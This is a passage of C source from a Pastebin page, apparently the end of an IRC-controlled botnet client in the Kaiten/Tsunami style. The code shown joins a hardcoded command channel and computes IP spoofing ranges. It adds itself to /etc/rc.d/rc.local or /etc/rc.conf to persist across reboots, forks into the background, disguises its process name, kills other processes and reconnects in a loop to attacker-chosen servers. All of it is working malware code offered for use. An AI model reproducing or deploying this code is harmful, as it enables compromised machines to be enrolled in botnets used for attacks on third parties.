  1392. void _376(int sock, char *sender, char *str) {
  1393. Send(sock,"MODE %s -xi\n",nick);
  1394. Send(sock,"JOIN %s :%s\n",chan,key);
  1395. Send(sock,"WHO %s\n",nick);
  1396. }
  1397. void _PING(int sock, char *sender, char *str) {
  1398. Send(sock,"PONG %s\n",str);
  1399. }
  1400. void _352(int sock, char *sender, char *str) {
  1401. int i,d;
  1402. char *msg=str;
  1403. struct hostent *hostm;
  1404. unsigned long m;
  1405. for (i=0,d=0;d<5;d++) {
  1406. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  1407. if (i == strlen(str)) return;
  1408. }
  1409. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  1410. msg[i]=0;
  1411. if (!strcasecmp(msg,nick) && !spoofsm) {
  1412. msg=str;
  1413. for (i=0,d=0;d<3;d++) {
  1414. for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
  1415. if (i == strlen(str)) return;
  1416. }
  1417. for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
  1418. msg[i]=0;
  1419. if ((m = inet_addr(msg)) == -1) {
  1420. if ((hostm=gethostbyname(msg)) == NULL) {
  1421. Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
  1422. return;
  1423. }
  1424. memcpy((char*)&m, hostm->h_addr, hostm->h_length);
  1425. }
  1426. ((char*)&spoofs)[3]=((char*)&m)[0];
  1427. ((char*)&spoofs)[2]=((char*)&m)[1];
  1428. ((char*)&spoofs)[1]=((char*)&m)[2];
  1429. ((char*)&spoofs)[0]=0;
  1430. spoofsm=256;
  1431. }
  1432. }
  1433. void _433(int sock, char *sender, char *str) {
  1434. free(nick);
  1435. nick=makestring();
  1436. }
  1437. void _NICK(int sock, char *sender, char *str) {
  1438. int i;
  1439. for (i=0;i<strlen(sender) && sender[i] != '!';i++);
  1440. sender[i]=0;
  1441. if (!strcasecmp(sender,nick)) {
  1442. if (*str == ':') str++;
  1443. if (nick) free(nick);
  1444. nick=strdup(str);
  1445. }
  1446. }
  1447. struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
  1448. { "352", _352 },
  1449. { "376", _376 },
  1450. { "433", _433 },
  1451. { "422", _376 },
  1452. { "PRIVMSG", _PRIVMSG },
  1453. { "PING", _PING },
  1454. { "NICK", _NICK },
  1455. { (char *)0, (void (*)(int,char *,char *))0 } };
  1456. void con() {
  1457. struct sockaddr_in srv;
  1458. unsigned long ipaddr,start;
  1459. int flag;
  1460. struct hostent *hp;
  1461. start:
  1462. sock=-1;
  1463. flag=1;
  1464. if (changeservers == 0) server=servers[rand()%numservers];
  1465. changeservers=0;
  1466. while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
  1467. if (inet_addr(server) == 0 || inet_addr(server) == -1) {
  1468. if ((hp = gethostbyname(server)) == NULL) {
  1469. server=NULL;
  1470. close(sock);
  1471. goto start;
  1472. }
  1473. bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
  1474. }
  1475. else srv.sin_addr.s_addr=inet_addr(server);
  1476. srv.sin_family = AF_INET;
  1477. srv.sin_port = htons(6667);
  1478. ioctl(sock,FIONBIO,&flag);
  1479. start=time(NULL);
  1480. while(time(NULL)-start < 10) {
  1481. errno=0;
  1482. if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
  1483. setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
  1484. setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
  1485. setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
  1486. return;
  1487. }
  1488. if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
  1489. sleep(1);
  1490. }
  1491. server=NULL;
  1492. close(sock);
  1493. goto start;
  1494. }
  1495. int main(int argc, char **argv) {
  1496. int on,i;
  1497. char cwd[256],*str;
  1498. FILE *file;
  1499. #ifdef STARTUP
  1500. str="/etc/rc.d/rc.local";
  1501. file=fopen(str,"r");
  1502. if (file == NULL) {
  1503. str="/etc/rc.conf";
  1504. file=fopen(str,"r");
  1505. }
  1506. if (file != NULL) {
  1507. char outfile[256], buf[1024];
  1508. int i=strlen(argv[0]), d=0;
  1509. getcwd(cwd,256);
  1510. if (strcmp(cwd,"/")) {
  1511. while(argv[0][i] != '/') i--;
  1512. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  1513. while(!feof(file)) {
  1514. fgets(buf,1024,file);
  1515. if (!strcasecmp(buf,outfile)) d++;
  1516. }
  1517. if (d == 0) {
  1518. FILE *out;
  1519. fclose(file);
  1520. out=fopen(str,"a");
  1521. if (out != NULL) {
  1522. fputs(outfile,out);
  1523. fclose(out);
  1524. }
  1525. }
  1526. else fclose(file);
  1527. }
  1528. else fclose(file);
  1529. }
  1530. #endif
  1531. if (fork()) exit(0);
  1532. #ifdef FAKENAME
  1533. strncpy(argv[0],FAKENAME,strlen(argv[0]));
  1534. for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
  1535. #endif
  1536. srand((time(NULL) ^ getpid()) + getppid());
  1537. nick=makestring();
  1538. ident=makestring();
  1539. user=makestring();
  1540. chan=CHAN;
  1541. key=KEY;
  1542. server=NULL;
  1543. sa:
  1544. #ifdef IDENT
  1545. for (i=0;i<numpids;i++) {
  1546. if (pids[i] != 0 && pids[i] != getpid()) {
  1547. kill(pids[i],9);
  1548. waitpid(pids[i],NULL,WNOHANG);
  1549. }
  1550. }
  1551. pids=NULL;
  1552. numpids=0;
  1553. identd();
  1554. #endif
  1555. con();
  1556. Send(sock,"NICK %s%s\nUSER %s localhost localhost :%s\n", PREFIX,nick,ident,user);
  1557. while(1) {
  1558. unsigned long i;
  1559. fd_set n;
  1560. struct timeval tv;
  1561. FD_ZERO(&n);
  1562. FD_SET(sock,&n);
  1563. tv.tv_sec=60*20;
  1564. tv.tv_usec=0;
  1565. if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
  1566. for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
  1567. unsigned int *newpids,on;
  1568. for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
  1569. pids[on-1]=0;
  1570. numpids--;
  1571. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  1572. for (on=0;on<numpids;on++) newpids[on]=pids[on];
  1573. free(pids);
  1574. pids=newpids;
  1575. }
  1576. if (FD_ISSET(sock,&n)) {
  1577. char buf[4096], *str;
  1578. int i;
  1579. if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
  1580. buf[i]=0;
  1581. str=strtok(buf,"\n");
  1582. while(str && *str) {
  1583. char name[1024], sender[1024];
  1584. filter(str);
  1585. if (*str == ':') {
  1586. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  1587. str[i]=0;
  1588. strcpy(sender,str+1);
  1589. strcpy(str,str+i+1);
  1590. }
  1591. else strcpy(sender,"*");
  1592. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  1593. str[i]=0;
  1594. strcpy(name,str);
  1595. strcpy(str,str+i+1);
  1596. for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
  1597. if (!strcasecmp(name,"ERROR")) goto sa;
  1598. str=strtok((char*)NULL,"\n");
  1599. }
  1600. }
  1601. }
  1602. return 0;
  1603. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!